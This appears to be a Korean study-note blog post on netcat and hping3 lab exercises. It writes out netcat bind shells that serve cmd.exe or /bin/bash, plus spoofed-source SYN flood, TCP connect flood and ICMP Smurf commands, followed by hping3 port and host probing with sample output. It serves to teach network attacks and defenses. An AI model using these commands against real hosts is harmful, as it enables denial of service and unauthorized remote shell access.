본문 바로가기

About../Security

NC 사용법

Network Attack

NC

! NC 연결후 채팅하기 사용하기

! 서버 설정

# nc -l -p 3000

c:\> nc -lvp 3000

! 클라이언트 설정

# nc <Server_ip> 3000

! 연결한 Message 입력하면 연결된 사용자간 Message 전달된다.

   

==============================================

Linux에서 --> Windows 접속

Windows NC 받아 C:\ 압출 풀어 놓는다..

c:\> nc -l -p 30000 -e cmd.exe

! 공격자 측에서...

nc <서버IP> 30000

Windows에서 --> Linux 접속

! Linux에서 설정

# nc -l -p 30000 -e /bin/bash

! Windows에서 설정

C:\>nc <서버IP> 30000

==============================================

   

*****************

 Syn flooding Attack

*****************

; 현재 거의 모든 시스템은 방어 설정이 되어 있음....

! victim 설정  (공격당하는 포트 상태 모니터링 위한 설정)

# while [ 1 ]

>do

>netstat -ant

>sleep 1

>done

! Attacker 설정 ( HTTPD 실행한 )

# hping  -a  1.1.1.1  victim_ip  -p 80 -S -i u10000

-a <위장할 IP>

-p <목적지 포트>

-S : syn flag 설정

-i interval  : 생성간격 설정 (Example : -i u1000   1000 1초당 1)

u1000  : 초당 1,   u10000 초당 10개의 packet 생성

자세한 도움말은....

"hping --help" 명령을 이용한다...

   

********************************

 tcp connect flooding  (자원 고갈 공격)

********************************

! 공격자 설정

# while [ 1 ]

> do

> nc <victim_ip>  <port> &

> done

! 희생자 설정  Linux 에서...  netstat -ant sleep 1 (1 마다 반복)

# while [ 1 ]

> do

> netstat -ant

> sleep 1

> done

   

*********************

 ICMP Smurf Attack

*********************

# hping -1 10.10.10.255 -a <victim-ip> -i u10000

   

example>

hping -1 10.10.10.255 -a 10.10.10.33 -i u10000

! 공격 당하는 컴퓨터는 Ethereal 실행 모니터링을 한다.

  자신이 요청하지 않은 많은 icmp응답 패킷이 들어오는 것을 확인한다......

HPING

[HPING] hping 이용한 호스트 포트 탐지 방법

   

   

HPING3 - Host and Port 탐지

=======================================

 Tool: HPING: http://www.hping.org/download.html

=======================================

   

PART I

   

TCP SYN Packet 탐지 :

=================================================

목적지에 TCP SYN flag 설정하여 전송하며, Port 열려 있는 경우 SYN/ACL flag Packet으로 응답이 올것이고, 닫혀있는 Port 경우 RST/ACK flag Packet으로 응답하게 된다.

   

[root@hcne]#hping3 192.168.50.254 -S -c 1 -p 80

   

Switches defined :

-S = Set the SYN flag.

-c 1 = Packet count. In this example, I only sent one.

- p 21 = The port on the remote host I want to send the packet to.

   

bt ~ # hping3 192.168.50.254 -S -c 1 -p 80

HPING 192.168.50.254 (eth0 192.168.50.254): S set, 40 headers + 0 data bytes

len=46 ip=192.168.50.254 ttl=64 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=1.2 ms

   

--- 192.168.50.254 hping statistic ---

1 packets tramitted, 1 packets received, 0% packet loss

round-trip min/avg/max = 1.2/1.2/1.2 ms

   

NOTE : 응답 패킷은 len=46으로 시작하는 필드이다.

   

패킷 전송으로 192.168.50.254 포트에 80 포트가 열려 있는 것을 확인할 있다.

TCP 연결은 3-way handshake 요구하기 때문에 SYN/ACK 보내왔다.

   

응답 패킷 필드에 내용은 다음과 같다.

   

S set – The SYN flag is set.

40 headers + 0 data bytes Data 0 byte이고 IP Header(20byte) + TCP Header(20byte) 나타낸다.

len - byte단위에 사이즈를 나타낸다. Data Link Header Size 포함된 크기이다.

ip 목적지 IP Address 나타낸다.

ttl Packet Default Time-to-live 설정값이다.

DF - "don't fragment" bit 설정

id = IP identification정보

sport = Source Port이다. 응답해오는 포트이므로 전송시 목적지로 명시한 포트이다.

flags = 응답 패킷에 flag 설정

seq = TCP Header Sequence number (32bit)

win = TCP window size.

rtt = round trip time in milliseconds.

   

만약 닫혀있는 포트에 SYN 패킷을 전송하면 RTS/ACK 패킷을 받게 된다.

   

[root@bt]#hping3 10.10.10.10 -S c 1 -p 8

   

bt ~ # hping3 192.168.50.254 -S -c 1 -p 8

HPING 192.168.50.254 (eth0 192.168.50.254): S set, 40 headers + 0 data bytes

len=46 ip=192.168.50.254 ttl=64 DF id=0 sport=8 flags=RA seq=0 win=0 rtt=1.2 ms

   

--- 192.168.50.254 hping statistic ---

1 packets tramitted, 1 packets received, 0% packet loss

round-trip min/avg/max = 1.2/1.2/1.2 ms

   

Port 8 TCP SYN 패킷을 보내보니 RST/ACK flag 설정된 응답패킷을 받았다. 포트는 닫혀있을을 의미한다.

   

   

TCP ACK packet : Host alive 검사한다.

=================================================

Host ACK(acknowledge) bit flag 설정하여 패킷을 전송하면, 호스트가 존재하는 경우 포트에 Open/Close 상태에 상관없이 RTS flag 설정하여 전송한다.

   

[root@hcne]#hping3 192.168.50.254 -A c 1 -p 8

   

Switches defined :

-A = ACK flag 설정

-c 1 = Packet count 1

- p 123 = Packet 전송할 목적지 포트 123지정

   

bt ~ # hping3 192.168.50.254 -A -c 1 -p 8

HPING 192.168.50.254 (eth0 192.168.50.254): A set, 40 headers + 0 data bytes

len=46 ip=192.168.50.254 ttl=64 DF id=0 sport=8 flags=R seq=0 win=0 rtt=1.2 ms

   

   

만약 존재하지 않는 IP Address Packet 전송한 경우 다음과 같은 내용을 있다.

   

bt ~ # hping3 192.168.50.252 -A -c 1 -p 8

HPING 192.168.50.252 (eth0 192.168.50.252): A set, 40 headers + 0 data bytes

   

--- 192.168.50.252 hping statistic ---

1 packets tramitted, 0 packets received, 100% packet loss

round-trip min/avg/max = 0.0/0.0/0.0 ms

   

   

TCP SYN/ACK packet : 호스트 활성상태 검사하는 다른 방법

==================================================

   

TCP SYN/ACK Flag 설정하여 전송하여도 ACK flag 설정하여 전송하는 경우와 동일한 결과를 있다.

   

[root@bt]#hping3 10.10.10.10 -SA c 1 -p 8

   

bt ~ # hping3 192.168.50.254 -SA -c 1 -p 8

HPING 192.168.50.254 (eth0 192.168.50.254): SA set, 40 headers + 0 data bytes

len=46 ip=192.168.50.254 ttl=64 DF id=0 sport=8 flags=R seq=0 win=0 rtt=8.3 ms

   

Microsoft Office OneNote 2007을 사용하여 작성했습니다.
모든 노트 및 정보를 한 곳에서 볼 수 있습니다.